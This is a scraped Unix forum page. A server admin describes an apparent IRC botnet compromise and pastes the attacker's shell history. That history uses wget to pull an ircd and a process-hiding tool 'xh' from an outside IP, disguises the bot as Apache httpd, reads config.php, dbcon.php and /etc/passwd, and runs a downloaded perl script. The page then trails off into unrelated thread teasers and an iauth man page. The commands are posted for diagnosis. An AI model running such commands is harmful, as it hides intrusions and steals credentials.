@Corona.
If it means about full backup of each domain in /home, no I didnt make any backup. Disk space is limited and no additional disk. Last option maybey I should request OS restore to the hosting provider(?).
I was doing deep analyze of this attack for several days, and I guess my server has been turned to be one of botnet in the internet for several months or maybey in a year.
One thing that makes me confuse. I have locked the domain account that might be has been compromised, after doing the procedures above, how can the attacker create multiple processes and open port 6667,7000 with that locked account name and established connection to xxx.IRC.dal.net?
@Neo.
Thanks for your suggestion. I'll learn about that tripwire technique.
But, do you have any idea about how the attacker compromised my server?
# Additional information.
Here I give part of command history left by the attacker in last days.
Code:
pwd
history
cd /data/PEAR
ls -al
rm -rf bahamut-1.8.9
wget http://193.180.115.30/~online/tools/bahamut-1.8.9-release.tar.gz ;
tar -zxvf bahamut-1.8.9-release.tar.gz ;
rm -f bahamut-1.8.9-release.$
ls -al //ircd/template.conf
mkdir ircd
pwd
cd ..
mkdir ircd
cd ircd
cp /ircd/* .
ls -al
ls -al /ircd
rm -rf /ircd
ls -al
exit
cd /data/PEAR/ircd
save
hostname ; /sbin/ifconfig | grep inet
pwd
pico ircd.conf
ls -al
wget http://193.180.115.30/~online/tools/xh ; chmod +x xh ; ls -alF xh
ps aux
./xh -s "/usr/local/apache/bin/httpd -k start -DSSL" ./ircd
cd ..
pwd
id
exit
And here the another part of command.
Code:
cd $home
ls -al
cd public_html
ls -al
cat config.php
cat dbcon.php
cat /etc/passwd
wget http://193.180.115.30/~online/ftp ; ls -alF ftp*
perl ftp
rm -f ftp ftp.txt
exit
/* Linux Slackware */
looking in my logs I see tons of entries similar to below. Does anyone know what these mean, and should I be concerned. I looked up a few of the IP's at Arin.net and saw that many of them belong to isp's (not good).. Any information is helpful..
Body of Messages log... (1 Reply)
Hello!
I have a Linux nfs server (called server100 below) with a export nfs. My problem is that the Solaris client (called client100 below) doesn't seems to like it. In the Solaris syslog I got following messages (and after a while the solaris client behave liked its hanged/to buzy). Also see... (3 Replies)
Hi All,
I need your expertise in finding a way to solve my problem.Please excuse if this is not the right forum to ask this question and guide me to the correct forum,if possible.
I am a DBA and on a daily basis i have to ftp huge dump files from my company server to my laptop and then... (3 Replies)
Dear Friends,
Sorry for this basic request. But I just started learning Ksh recently and still I am a newbie in this field.
Q: I have files on one server and the date format is 20121001000009_224625.in which has year (yyyy) month (mm) and date (dd). I have these files on server A. The task... (8 Replies)
I need to connect to a ftp server-1 from linux server-2 and copy/get a file from server-1 which follows a name pattern of FILENAME* (located on the root directory) and copy on a directory on server-2. Later, I have to use this file for ETL loading... For this I tried using as below
/usr/bin/ftp... (8 Replies)
Hi ,
Is there any script to copy a files (weblogic bianary + silent.xml ) from one server (linux) to another servers and then execute the copy file.
We want to copy a file on multiple servers and run the installation.
Thanks (1 Reply)
I have 3 servers A, B, C and server B is having some files in /u01/soa/ directory, these files i want to copy to server C, and i want to run the script from server A.
Script(Server A) --> Files at Server B (Source server) --> Copy the files to Server C(Target Server).
We dont have RSA key... (4 Replies)
Hi,
I am trying to automate the process of fetching files from remote server to local server through sftp. I have the username and password for the remote solaris server. But I need to give password manually everytime i run the script.
Can anyone help me in automating the script such that it... (3 Replies)
Hi everyone,
I hope I am posting in the right spot and I really need some help. I am going through a horrible divorce and I am afraid that my husband has compromised . He set up my mac computer and router and for my job set up remote access for me. I caught him cheating on me and I think he... (6 Replies)
Discussion started by: kk243665
6 Replies
LEARN ABOUT DEBIAN
iauth
IAUTH(8) System Manager's Manual IAUTH(8)NAME
iauth - The Internet Relay Chat Authentication Program
SYNOPSIS
iauth [ -v | -c configfile ]
DESCRIPTION
iauth is a slave process used by the ircd program to perform the authentication of incoming TCP connections. The ircd program starts iauth
upon startup.
iauth will close and reopen the log file whenever it receives a user signal 2, SIGUSR2. This is useful to rotate the log file.
OPTIONS -c filename
When this flag is given, the program will read the configuration file specify and validate it. This is useful to check for errors
in the setup.
-v This option dumps information about the version.
EXAMPLE
millennium% iauth -c iauth.conf
iauth 2.10
Reading "iauth.conf"
Module(s) loaded:
rfc931
COPYRIGHT
(c) 1998 Christophe Kalt
For full COPYRIGHT see LICENSE file with IRC package.
FILES
"iauth.conf"
SEE ALSO iauth.conf(5)ircd(8)BUGS
None... ;-) if somebody finds one, please send mail to ircd-bugs@irc.org
AUTHOR
Christophe Kalt.
$Date: 2001/10/20 17:57:24 $ IAUTH(8)
01-16-2013
Need deep technical explanations
